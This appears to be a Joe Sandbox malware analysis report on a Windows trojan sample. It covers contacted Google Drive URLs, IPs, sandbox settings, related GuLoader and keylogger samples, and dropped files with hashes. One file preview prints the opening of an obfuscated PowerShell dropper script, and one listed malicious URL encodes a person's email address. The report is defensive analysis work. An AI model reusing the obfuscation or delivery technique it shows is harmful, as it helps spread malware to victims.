                            https://drive.google.com/ertificatesmsiexec.exe, 00000008.00000003.2185608477.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2135873204.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2172678889.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2147098085.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2123562712.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2161927602.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2098833921.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2110507536.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2087985140.0000000007FF3000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://drive.google.com/smsiexec.exe, 00000008.00000003.2397727614.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2408835178.0000000007FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://drive.google.com/rmsiexec.exe, 00000008.00000003.2185608477.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2284814512.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2249580479.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2273099966.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2295597744.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2262078863.0000000007FED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2220377097.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2209315293.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2231876313.0000000007FF2000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://drive.usercontent.google.com/&msiexec.exe, 00000008.00000003.2479027485.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2491715042.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2503831860.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2515750713.0000000007FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
URL: https://drive.usercontent.google.com/
Source: msiexec.exe, 00000008.00000003.2185608477.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2284814512.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2562006346.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2397727614.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2295597744.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2352334753.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2135873204.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2249580479.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2262078863.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2273099966.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2340671273.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2374936208.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2172678889.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2307435185.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2363131954.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2220377097.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2295597744.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2479027485.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2147098085.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2123562712.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2161927602.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: https://drive.usercontent.google.com/:
Source: msiexec.exe, 00000008.00000002.2585091489.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2575236744.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: https://drive.google.com/l
Source: msiexec.exe, 00000008.00000003.2110507536.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: https://drive.google.com/te.google.com
Source: msiexec.exe, 00000008.00000003.2185608477.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2284814512.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2397727614.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2352334753.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2135873204.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2249580479.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2273099966.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2340671273.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2374936208.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2172678889.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2363131954.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2295597744.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2147098085.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2123562712.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2161927602.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2262078863.0000000007FED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2220377097.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2209315293.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2231876313.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2318203930.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2307435185.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: https://apis.google.com
Source: msiexec.exe, 00000008.00000003.2515750713.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2135941062.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2432767321.0000000007F99000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: http://nsis.sf.net/NSIS_ErrorError
Source: YrCSUX2O3I.exe, YrCSUX2O3I.exe.2.dr
Malicious: false
Reputation: high

URL: https://drive.google.com/g
Source: msiexec.exe, 00000008.00000003.2562006346.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2479027485.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2466820778.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2444511172.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2491715042.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2585091489.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2526749849.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2575236744.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2549615290.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2538548894.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2503831860.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2455058177.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2515750713.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: https://drive.google.com/nalytics-cn.com
Source: msiexec.exe, 00000008.00000003.2135873204.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2172678889.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2147098085.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2123562712.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2161927602.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2098833921.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2110507536.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2087985140.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: https://drive.google.com/devine.cn
Source: msiexec.exe, 00000008.00000003.2135873204.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2123562712.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2110507536.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: https://drive.google.com/C
Source: msiexec.exe, 00000008.00000003.2329580852.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2466820778.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2515750713.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2262078863.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2562006346.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2421732807.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2295597744.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2123795079.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2503831860.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2549615290.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2408835178.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2220377097.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2397727614.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2135941062.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2575236744.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2209315293.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2273099966.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2284814512.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2363131954.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2374936208.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2172727495.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: https://drive.google.com/c
Source: msiexec.exe, 00000008.00000003.2185608477.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2284814512.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2397727614.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2352334753.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2249580479.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2273099966.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2340671273.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2374936208.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2363131954.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2295597744.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2408835178.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2262078863.0000000007FED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2220377097.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2209315293.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2231876313.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2444511172.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2318203930.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2307435185.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2421732807.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2385950640.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2329580852.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high
IP | Domain | Country | ASN | ASN Name | Malicious
142.250.181.225 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
142.250.184.206 | drive.google.com | United States | 15169 | GOOGLEUS | false
                                                          Joe Sandbox version:42.0.0 Malachite
                                                          Analysis ID:1588371
                                                          Start date and time:2025-01-11 01:28:40 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 5m 52s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:11
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:YrCSUX2O3I.exe
                                                          renamed because original name is a hash value
                                                          Original Sample Name:d15433cca1e4b6695379317ef0650e4cf9f07fcd5317b8d84343465f3d9186d8.exe
                                                          Detection:MAL
                                                          Classification:mal100.troj.evad.winEXE@6/15@2/2
                                                          EGA Information:
                                                          • Successful, ratio: 50%
                                                          HCA Information:
                                                          • Successful, ratio: 97%
                                                          • Number of executed functions: 33
                                                          • Number of non-executed functions: 28
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                          • Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
Time | Type | Description
19:29:34 | API Interceptor | 38x Sleep call for process: powershell.exe modified
19:30:44 | API Interceptor | 22x Sleep call for process: msiexec.exe modified
Match: s-part-0017.t-0009.t-msedge.net
Associated Sample Name / URL | Detection | Threat Name | Context
http://unikuesolutions.com/ck/bd/%7BRANDOM_NUMBER05%7D/YmVuc29uLmxpbkB2aGFjb3JwLmNvbQ== | malicious | Unknown | 13.107.246.45
uG3I84bQEr.exe | malicious | FormBook | 13.107.246.45
12621132703258916868.js | malicious | Strela Downloader | 13.107.246.45
Cpfkf79Rzk.exe | malicious | GuLoader | 13.107.246.45
https://noiclethomas.wixsite.com/rice | malicious | Unknown | 13.107.246.45
TjoY7n65om.exe | malicious | Snake Keylogger | 13.107.246.45
OKkUGRkZV7.exe | malicious | Remcos | 13.107.246.45
https://app.online.mt.com/e/es?s=961579678&e=14507707&elqTrackId=4f40dcb3a3854013ad3a46d461cc3aff&elq=5140e028df1a42afab491350388fd129&elqaid=221811&elqat=1&elqcst=272&elqcsid=2325629&elqak=8AF5D97DFF9E423CC7C7524F5CA3C1A86F5F67341B9DF612D5A2FB20DE928F2AA351 | malicious | Unknown | 13.107.246.45
https://maya-lopez.filemail.com/t/XhcWEjoR | malicious | Unknown | 13.107.246.45
Kb94RzMYNf.exe | malicious | Snake Keylogger, VIP Keylogger | 13.107.246.45
Match: 37f463bf4616ecd445d4a1937da06e19
Associated Sample Name / URL | Detection | Threat Name | Context
4AMVusDMPP.exe | malicious | GuLoader, MassLogger RAT | 142.250.181.225, 142.250.184.206
4AMVusDMPP.exe | malicious | GuLoader | 142.250.181.225, 142.250.184.206
Cpfkf79Rzk.exe | malicious | GuLoader | 142.250.181.225, 142.250.184.206
TjoY7n65om.exe | malicious | Snake Keylogger | 142.250.181.225, 142.250.184.206
Kb94RzMYNf.exe | malicious | Snake Keylogger, VIP Keylogger | 142.250.181.225, 142.250.184.206
WGi85dsMNp.exe | malicious | GuLoader, MassLogger RAT | 142.250.181.225, 142.250.184.206
TVPfW4WUdj.exe | malicious | GuLoader | 142.250.181.225, 142.250.184.206
WGi85dsMNp.exe | malicious | GuLoader | 142.250.181.225, 142.250.184.206
WtZl31OLfA.exe | malicious | Remcos, GuLoader | 142.250.181.225, 142.250.184.206
czHx16QwGQ.exe | malicious | GuLoader, MassLogger RAT | 142.250.181.225, 142.250.184.206
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:modified
                                                          Size (bytes):53158
                                                          Entropy (8bit):5.062687652912555
                                                          Encrypted:false
                                                          SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                          MD5:5D430F1344CE89737902AEC47C61C930
                                                          SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                          SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                          SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                          Malicious:false
                                                          Reputation:moderate, very likely benign file
                                                          Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:high, very likely benign file
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:high, very likely benign file
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Users\user\Desktop\YrCSUX2O3I.exe
                                                          File Type:Matlab v4 mat-file (little endian) , numeric, rows 0, columns 0
                                                          Category:dropped
                                                          Size (bytes):486421
                                                          Entropy (8bit):1.2470433609131586
                                                          Encrypted:false
                                                          SSDEEP:1536:p9ffEEX6My2RPkr6vyxsgBVdhrF8pGQkuxMSmLgnrL94:bffg2CJbdlFhh2Mwl4
                                                          MD5:858C7D246EC84B37359FDE23A9F8898A
                                                          SHA1:2046EFB2E9421F1F1C0CABA9F0D7ECCAD1F4AE0F
                                                          SHA-256:100C199A129F94FB16BDD51943FB691AB055CEA690088691C0F989D4C1C75884
                                                          SHA-512:547AA46E6279DD8DF920C2BF21B5A98B47F8B2F81E32FB36678119BC9510CA7D358C38C63E46E71285B76236D46D515CFE7C4DEA37660AE63E533AB78878ABBB
                                                          Malicious:false
                                                          Preview:......................................................................;.............................................................Do.......................................9.....................................................................................8...................T......................................................................................................................................k.............................................................{.(................c.............................).....s..................... ..................N.............q............2..............................................................................................c...................C..........................................G......................`.......|..............7.........0!..................p.........'..............)..........v.z.......................................................................................................[.s............~..A...+..
                                                          Process:C:\Users\user\Desktop\YrCSUX2O3I.exe
                                                          File Type:Unicode text, UTF-8 text, with very long lines (4591), with CRLF, LF line terminators
                                                          Category:dropped
                                                          Size (bytes):79359
                                                          Entropy (8bit):5.15915298929585
                                                          Encrypted:false
                                                          SSDEEP:1536:m5tb3o74kdusTkb5O+AOycf//ZiD3ueGaHT/VPkjB860myORQS8Cp:K413AK6/03ulazN+BLyO6M
                                                          MD5:A075DC6E560DD3AD9464CC1BB85F9E37
                                                          SHA1:19672DE1F8038EF66A3A5B5A612E27E5F2063D6E
                                                          SHA-256:3655D8F8ACA4048B5935D4DE1D1FEA8B89AF57F4B317B4EF9681DCFC5AEF9170
                                                          SHA-512:D90131C3F8555FB11B6EE86E1D307AD6D2548E15D67B325A8B7DDCB1100BAFCD8A36883076861E61A12995923FB86254EAFC037F5924ED9FEA40D12FDE16A4AB
                                                          Malicious:false
                                                          Preview:$Calcareobituminous140=$Retholter;.....<#Grundfarve Pejlekompasset Diagrammatically Tryllendes Dements Drivgasserne #>..<#ungelatinousness Opmuntrende Stepmother cochleare Kodeordene Kapitalstrkes #>..<#Nominalvrdiers Modtagelser Gibraltars Snvle #>..<#Drugshop Skdeskind Plasmolyse Retsopgret Lipotropic Cynocrambe #>..<#Blepharoblennorrhea Weathercocky Cauked Juwise Stratagematist #>..<#Cucullately Citronmelissens Junktur Allergiske Reformproof #>...$kraners = @'. Rendit.anne re$UndistoUMarcasisOoph retSarongha sensfobSerumaliHeliogrlDbrn rreBla esrs Mater =Artrigr$ArbejdsSstivkradCockshoe jortenlDebateai SeacangPuppi ghFremmeteD kortedDefsi.osinddatef ,seudooUnshrinrepacrisbLatinitrDialogfyNorenekd Rem geeSalgssilAluminysKaf.efle ingefarForbeninMindedieDisjunk;Smrfeds.TaeniosfPalmipeu Over onAbundancPressurtSki,masi,hoppiloemittennSkovtu. restrinSSminkeruSanerinpD.hydraePos ererAssailagKomma dgnynazise CongrinHapticae,ksilsa Reetab(Lunatum$ B shmaHPaviserjWeiersts UltracpMi jforn Ha
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                          Category:dropped
                                                          Size (bytes):1069784
                                                          Entropy (8bit):7.570387112382367
                                                          Encrypted:false
                                                          SSDEEP:24576:Cj+EenCKbbn+vG0zZpwmNG3Ap137dboaPjyMi76Kby:2+7CKbb+vG0V6t3IRM+i763
                                                          MD5:13DCCF3D94C8435353A3BF886CA19E7E
                                                          SHA1:52474B83A6EA7CF75D1D4986B32E26D87B7074EB
                                                          SHA-256:D15433CCA1E4B6695379317EF0650E4CF9F07FCD5317B8D84343465F3D9186D8
                                                          SHA-512:6F98FFF35A5643660AECD83ABCC9253659C90B3057B8678C999C13A9DBBDB691847BADE8A0760F4ECE647086C427EC44D7A4AEC27AE2649367AD89B08E056CA2
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 58%
                                                          • Antivirus: Virustotal, Detection: 59%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....e.Q.................b...........1............@..........................@.......................................................P...............I...............................................................................................text....`.......b.................. ..`.rdata..`............f..............@..@.data................|..............@....ndata.......P...........................rsrc........P......................@..@................................................................................................................................................................................................................................................................................................................................................................
